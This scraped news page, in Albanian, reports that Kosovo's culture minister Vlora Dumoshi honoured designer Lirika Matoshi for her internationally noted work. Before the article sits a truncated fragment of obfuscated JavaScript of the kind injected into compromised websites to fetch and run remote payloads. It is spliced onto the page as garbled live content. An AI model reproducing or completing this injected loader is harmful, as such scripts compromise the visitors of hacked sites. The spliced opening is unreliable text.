;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vlora Dumoshi i ndan mirënjohje stilistes Lirika Matoshi

By

Ministrja e Kulturës, Rinisë dhe Sportit Vlora Dumoshi i ka ndarë minrënjohje stilistes së njohur shqiptare, Lirika Matoshi e cila jeton dhe vepron në Shtetet e Bashkuara të Amerikës.

Matoshit mirënjohja iu nda për përfaqësimin e mirë që po i bën Kosovës në botë, me motivacionin “për punën e saj brilante në fushën e dizajnit dhe modës, në përmasa globale, duke e ngritur lartë emrin e Kosovës”.

Ditëve të fundit koleksioni i ri i veshjeve të saj me motiv të luleshtrydheve është bërë pjesë e artikullit në një prej gazetave më prestigjioze amerikane, The New York Times.

Ministrja  e Kulturës me këtë rast u shpreh e lumtur për suksesin e vajzave të Kosovës në Evropë e SHBA, emri i të cilave spikatet çdo ditë e më tepër në fushën e artit, muzikës e modës.

Nga ana tjetër, stilistja Lirika Matoshi shpalosi detaje për veshjen e cila tha se bazohet në vetë kujtimet e saj të rinisë dhe e falënderoi Ministren Dumoshi për pritjen dhe njohjen që po i bën punës e artit të saj.

Artikuj të ngjashëm